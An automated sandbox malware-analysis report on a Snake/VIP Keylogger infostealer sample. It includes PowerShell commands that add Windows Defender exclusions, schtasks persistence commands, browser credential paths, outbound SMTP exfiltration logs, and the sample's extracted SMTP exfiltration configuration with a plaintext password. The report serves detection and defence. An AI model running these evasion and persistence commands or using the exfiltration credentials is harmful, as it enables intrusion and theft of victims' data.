Edit tour

Windows Analysis Report
SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Overview

General Information

Sample name:	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe
Analysis ID:	1539353
MD5:	b2b44061f8271ad0f7d3a4febeb07751
SHA1:	d312798b7737931cb492abb1b7bd870f44bd9677
SHA256:	bc5ee788c33389a426c9b5b10405a41a83f6875864bf09b0de6df15ab88cfbda
Tags:	exe
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

.NET source code contains very large array initializations

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe (PID: 1444 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe" MD5: B2B44061F8271AD0F7D3A4FEBEB07751)

powershell.exe (PID: 6204 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7140 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 6116 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 5252 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xRAvleeiuDbJ" /XML "C:\Users\user\AppData\Local\Temp\tmp550.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 1488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe (PID: 3220 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe" MD5: B2B44061F8271AD0F7D3A4FEBEB07751)

xRAvleeiuDbJ.exe (PID: 7088 cmdline: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe MD5: B2B44061F8271AD0F7D3A4FEBEB07751)

schtasks.exe (PID: 3000 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xRAvleeiuDbJ" /XML "C:\Users\user\AppData\Local\Temp\tmp16A5.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 4136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

xRAvleeiuDbJ.exe (PID: 5536 cmdline: "C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe" MD5: B2B44061F8271AD0F7D3A4FEBEB07751)

xRAvleeiuDbJ.exe (PID: 2488 cmdline: "C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe" MD5: B2B44061F8271AD0F7D3A4FEBEB07751)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-usering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "sender@inhousepick.com", "Password": "#(P%eO^#J0", "Host": "smtp.inhousepick.com", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "sender@inhousepick.com", "Password": "#(P%eO^#J0", "Host": "smtp.inhousepick.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.4587075709.0000000000427000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000009.00000002.4587075709.0000000000427000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x8914:$a1: get_encryptedPassword 0x8c29:$a2: get_encryptedUsername 0x8724:$a3: get_timePasswordChanged 0x882d:$a4: get_passwordField 0x892a:$a5: set_encryptedPassword 0x9fd6:$a7: get_logins 0x9f39:$a10: KeyLoggerEventArgs 0x9b9e:$a11: KeyLoggerEventArgsEventHandler
0000000F.00000002.4591231709.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000009.00000002.4590760130.0000000002841000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.2149465805.0000000003951000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2149465805.0000000003951000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.2149465805.0000000003951000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.2149465805.0000000003951000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xc66a4:$a1: get_encryptedPassword 0x1098c4:$a1: get_encryptedPassword 0x14c8e4:$a1: get_encryptedPassword 0xc69b9:$a2: get_encryptedUsername 0x109bd9:$a2: get_encryptedUsername 0x14cbf9:$a2: get_encryptedUsername 0xc64b4:$a3: get_timePasswordChanged 0x1096d4:$a3: get_timePasswordChanged 0x14c6f4:$a3: get_timePasswordChanged 0xc65bd:$a4: get_passwordField 0x1097dd:$a4: get_passwordField 0x14c7fd:$a4: get_passwordField 0xc66ba:$a5: set_encryptedPassword 0x1098da:$a5: set_encryptedPassword 0x14c8fa:$a5: set_encryptedPassword 0xc7d66:$a7: get_logins 0x10af86:$a7: get_logins 0x14dfa6:$a7: get_logins 0xc7cc9:$a10: KeyLoggerEventArgs 0x10aee9:$a10: KeyLoggerEventArgs 0x14df09:$a10: KeyLoggerEventArgs
Process Memory Space: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe PID: 1444	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe PID: 1444	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe PID: 1444	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe PID: 1444	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe PID: 1444	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xfa86:$a1: get_encryptedPassword 0xfd91:$a2: get_encryptedUsername 0xf8a0:$a3: get_timePasswordChanged 0xf9a9:$a4: get_passwordField 0xfa9c:$a5: set_encryptedPassword 0x11f1d:$a7: get_logins 0x11e80:$a10: KeyLoggerEventArgs 0x11ae9:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe PID: 3220	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe PID: 3220	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe PID: 3220	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe PID: 3220	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf52:$a1: get_encryptedPassword 0x125d:$a2: get_encryptedUsername 0xd6c:$a3: get_timePasswordChanged 0xe75:$a4: get_passwordField 0xf68:$a5: set_encryptedPassword 0x33e9:$a7: get_logins 0x334c:$a10: KeyLoggerEventArgs 0x2fb5:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: xRAvleeiuDbJ.exe PID: 7088	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: xRAvleeiuDbJ.exe PID: 2488	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: xRAvleeiuDbJ.exe PID: 2488	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
9.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2db14:$a1: get_encryptedPassword 0x2de29:$a2: get_encryptedUsername 0x2d924:$a3: get_timePasswordChanged 0x2da2d:$a4: get_passwordField 0x2db2a:$a5: set_encryptedPassword 0x2f1d6:$a7: get_logins 0x2f139:$a10: KeyLoggerEventArgs 0x2ed9e:$a11: KeyLoggerEventArgsEventHandler
9.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e725:$s1: UnHook 0x2e72c:$s2: SetHook 0x2e734:$s3: CallNextHook 0x2e741:$s4: _hook
0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.39e9b90.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.39e9b90.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.39e9b90.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.39e9b90.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bd14:$a1: get_encryptedPassword 0x2c029:$a2: get_encryptedUsername 0x2bb24:$a3: get_timePasswordChanged 0x2bc2d:$a4: get_passwordField 0x2bd2a:$a5: set_encryptedPassword 0x2d3d6:$a7: get_logins 0x2d339:$a10: KeyLoggerEventArgs 0x2cf9e:$a11: KeyLoggerEventArgsEventHandler
0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.39e9b90.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39a7e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39121:$a3: \Google\Chrome\User Data\Default\Login Data 0x3937e:$a4: \Orbitum\User Data\Default\Login Data 0x39d5d:$a5: \Kometa\User Data\Default\Login Data
0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.39e9b90.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c925:$s1: UnHook 0x2c92c:$s2: SetHook 0x2c934:$s3: CallNextHook 0x2c941:$s4: _hook
0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3a2cdb0.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3a2cdb0.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3a2cdb0.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3a2cdb0.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bd14:$a1: get_encryptedPassword 0x2c029:$a2: get_encryptedUsername 0x2bb24:$a3: get_timePasswordChanged 0x2bc2d:$a4: get_passwordField 0x2bd2a:$a5: set_encryptedPassword 0x2d3d6:$a7: get_logins 0x2d339:$a10: KeyLoggerEventArgs 0x2cf9e:$a11: KeyLoggerEventArgsEventHandler
0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3a2cdb0.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39a7e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39121:$a3: \Google\Chrome\User Data\Default\Login Data 0x3937e:$a4: \Orbitum\User Data\Default\Login Data 0x39d5d:$a5: \Kometa\User Data\Default\Login Data
0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3a2cdb0.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c925:$s1: UnHook 0x2c92c:$s2: SetHook 0x2c934:$s3: CallNextHook 0x2c941:$s4: _hook
0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3a2cdb0.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3a2cdb0.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3a2cdb0.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3a2cdb0.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3a2cdb0.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2db14:$a1: get_encryptedPassword 0x70b34:$a1: get_encryptedPassword 0x2de29:$a2: get_encryptedUsername 0x70e49:$a2: get_encryptedUsername 0x2d924:$a3: get_timePasswordChanged 0x70944:$a3: get_timePasswordChanged 0x2da2d:$a4: get_passwordField 0x70a4d:$a4: get_passwordField 0x2db2a:$a5: set_encryptedPassword 0x70b4a:$a5: set_encryptedPassword 0x2f1d6:$a7: get_logins 0x721f6:$a7: get_logins 0x2f139:$a10: KeyLoggerEventArgs 0x72159:$a10: KeyLoggerEventArgs 0x2ed9e:$a11: KeyLoggerEventArgsEventHandler 0x71dbe:$a11: KeyLoggerEventArgsEventHandler
0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3a2cdb0.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e725:$s1: UnHook 0x71745:$s1: UnHook 0x2e72c:$s2: SetHook 0x7174c:$s2: SetHook 0x2e734:$s3: CallNextHook 0x71754:$s3: CallNextHook 0x2e741:$s4: _hook 0x71761:$s4: _hook
0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.39e9b90.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.39e9b90.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.39e9b90.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.39e9b90.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.39e9b90.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2db14:$a1: get_encryptedPassword 0x70d34:$a1: get_encryptedPassword 0xb3d54:$a1: get_encryptedPassword 0x2de29:$a2: get_encryptedUsername 0x71049:$a2: get_encryptedUsername 0xb4069:$a2: get_encryptedUsername 0x2d924:$a3: get_timePasswordChanged 0x70b44:$a3: get_timePasswordChanged 0xb3b64:$a3: get_timePasswordChanged 0x2da2d:$a4: get_passwordField 0x70c4d:$a4: get_passwordField 0xb3c6d:$a4: get_passwordField 0x2db2a:$a5: set_encryptedPassword 0x70d4a:$a5: set_encryptedPassword 0xb3d6a:$a5: set_encryptedPassword 0x2f1d6:$a7: get_logins 0x723f6:$a7: get_logins 0xb5416:$a7: get_logins 0x2f139:$a10: KeyLoggerEventArgs 0x72359:$a10: KeyLoggerEventArgs 0xb5379:$a10: KeyLoggerEventArgs
0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.39e9b90.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e725:$s1: UnHook 0x71945:$s1: UnHook 0xb4965:$s1: UnHook 0x2e72c:$s2: SetHook 0x7194c:$s2: SetHook 0xb496c:$s2: SetHook 0x2e734:$s3: CallNextHook 0x71954:$s3: CallNextHook 0xb4974:$s3: CallNextHook 0x2e741:$s4: _hook 0x71961:$s4: _hook 0xb4981:$s4: _hook
Click to see the 22 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, ParentProcessId: 1444, ParentProcessName: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe", ProcessId: 6204, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xRAvleeiuDbJ" /XML "C:\Users\user\AppData\Local\Temp\tmp16A5.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xRAvleeiuDbJ" /XML "C:\Users\user\AppData\Local\Temp\tmp16A5.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe, ParentImage: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe, ParentProcessId: 7088, ParentProcessName: xRAvleeiuDbJ.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xRAvleeiuDbJ" /XML "C:\Users\user\AppData\Local\Temp\tmp16A5.tmp", ProcessId: 3000, ProcessName: schtasks.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 208.91.199.223, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, Initiated: true, ProcessId: 3220, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49847

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xRAvleeiuDbJ" /XML "C:\Users\user\AppData\Local\Temp\tmp550.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xRAvleeiuDbJ" /XML "C:\Users\user\AppData\Local\Temp\tmp550.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, ParentProcessId: 1444, ParentProcessName: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xRAvleeiuDbJ" /XML "C:\Users\user\AppData\Local\Temp\tmp550.tmp", ProcessId: 5252, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, ParentProcessId: 1444, ParentProcessName: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe", ProcessId: 6204, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xRAvleeiuDbJ" /XML "C:\Users\user\AppData\Local\Temp\tmp550.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xRAvleeiuDbJ" /XML "C:\Users\user\AppData\Local\Temp\tmp550.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, ParentProcessId: 1444, ParentProcessName: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xRAvleeiuDbJ" /XML "C:\Users\user\AppData\Local\Temp\tmp550.tmp", ProcessId: 5252, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-22T15:42:22.522517+0200	2803305	3	Unknown Traffic	192.168.2.6	49716	188.114.96.3	443	TCP
2024-10-22T15:42:24.610277+0200	2803305	3	Unknown Traffic	192.168.2.6	49722	188.114.96.3	443	TCP
2024-10-22T15:42:26.263025+0200	2803305	3	Unknown Traffic	192.168.2.6	49730	188.114.96.3	443	TCP
2024-10-22T15:42:26.663881+0200	2803305	3	Unknown Traffic	192.168.2.6	49736	188.114.96.3	443	TCP
2024-10-22T15:42:30.150395+0200	2803305	3	Unknown Traffic	192.168.2.6	49760	188.114.96.3	443	TCP
2024-10-22T15:42:31.472056+0200	2803305	3	Unknown Traffic	192.168.2.6	49768	188.114.96.3	443	TCP
2024-10-22T15:42:33.444590+0200	2803305	3	Unknown Traffic	192.168.2.6	49784	188.114.96.3	443	TCP
2024-10-22T15:42:35.919780+0200	2803305	3	Unknown Traffic	192.168.2.6	49799	188.114.96.3	443	TCP
2024-10-22T15:42:35.935018+0200	2803305	3	Unknown Traffic	192.168.2.6	49798	188.114.96.3	443	TCP
2024-10-22T15:42:39.220810+0200	2803305	3	Unknown Traffic	192.168.2.6	49825	188.114.96.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-22T15:42:20.424360+0200	2803274	2	Potentially Bad Traffic	192.168.2.6	49712	132.226.247.73	80	TCP
2024-10-22T15:42:21.954971+0200	2803274	2	Potentially Bad Traffic	192.168.2.6	49712	132.226.247.73	80	TCP
2024-10-22T15:42:23.595397+0200	2803274	2	Potentially Bad Traffic	192.168.2.6	49718	132.226.247.73	80	TCP
